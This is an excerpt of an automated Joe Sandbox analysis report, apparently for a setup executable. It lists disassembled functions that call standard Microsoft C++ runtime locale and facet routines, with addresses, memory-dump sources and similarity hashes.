                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C90D
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C917
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C92E
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C937
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3C951
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3C965
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3C974
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C984
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3C98A
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C997
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2A8FA
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A90E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2A91D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A92D
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2A933
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C86A
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C874
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C88B
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C894
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC3C8AE
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3C8C2
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3C8D1
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C8E1
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3C8E7
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C8F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC21867
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC21871
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC21888
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC21891
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT(?,?,00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC218AB
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC218BF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC218CE
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC218DE
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC218E4
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC218F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC41836
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41840
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41857
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41860
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • collate.LIBCPMT ref: 6BC4187A
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC4188E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC4189D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC418AD
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC418B3
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC418C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcollatestd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1009662711-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25FAF
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC25FB9
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC25FD0
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC25FD9
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC25FF3
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC26007
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC26016
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26026
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2602C
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26039
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: e0f47c61e7f1e258dd1de5613d0e326bda2c0efbc411d3f5cccc696918d92c53
                                                                                              • Instruction ID: 20eed45552c8372baae4df26d799b1fc6f040d9b03bc93c28cd2affc89f22fcf
                                                                                              • Opcode Fuzzy Hash: e0f47c61e7f1e258dd1de5613d0e326bda2c0efbc411d3f5cccc696918d92c53
                                                                                              • Instruction Fuzzy Hash: EC01C4319206199BCF05DBB4C892AAE73357F85724F500568E121BB2D0FB3C9B01EB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CCDF
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CCE9
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CD00
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CD09
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC3CD23
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CD37
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CD46
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CD56
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CD5C
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CD69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_G@std@@@std@@@std@@Getcat@?$time_put@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$ostreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1124765478-3145022300
                                                                                              • Opcode ID: 21a44d42dd8fe2be1c3af48ab9d95ae3fff354638440ba8c3ee128b601253203
                                                                                              • Instruction ID: 8d85ad471a66e219a68a3a8fd5fe039f3a760c2849a5b3b034ef06004e539171
                                                                                              • Opcode Fuzzy Hash: 21a44d42dd8fe2be1c3af48ab9d95ae3fff354638440ba8c3ee128b601253203
                                                                                              • Instruction Fuzzy Hash: 8001C0319206399BCF01DBB4C852AAE7731AF84724F940528E120BB2D0FF3C9B01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CC3C
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CC46
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CC5D
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CC66
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3CC80
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CC94
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CCA3
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CCB3
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CCB9
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F17B,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CCC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 85c0019df5d748544163051efbe8acea8e6fc32d702b1176d6c1f46a4b490686
                                                                                              • Instruction ID: baa458ec836a9d77f3724ac9f59251909c39dfa796ea9f76f57c8a255fad8950
                                                                                              • Opcode Fuzzy Hash: 85c0019df5d748544163051efbe8acea8e6fc32d702b1176d6c1f46a4b490686
                                                                                              • Instruction Fuzzy Hash: 8E01A1319206399BCF05DBB0D8526AEB335AF81724F940129E1607B290FB3C9B019B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1E3A8
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3B2
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3C9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC1E3D2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC1E3EC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC1E400
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC1E40F
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E41F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC1E425
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E432
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$ctype@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@W@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 2584096039-3145022300
                                                                                              • Opcode ID: 81f000259268f5d9324118d33fb825d353553bad4d1e89cd616b43b673bc0139
                                                                                              • Instruction ID: 40401912f9dcc65c9abf13254849b0a77f79b8b6dd0eceb42c44f8e02b5a6edc
                                                                                              • Opcode Fuzzy Hash: 81f000259268f5d9324118d33fb825d353553bad4d1e89cd616b43b673bc0139
                                                                                              • Instruction Fuzzy Hash: 51018B3192462A9BCF00DBB4C852AED7331AF85728F540528E121BB290FB3C9B01EB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3A368
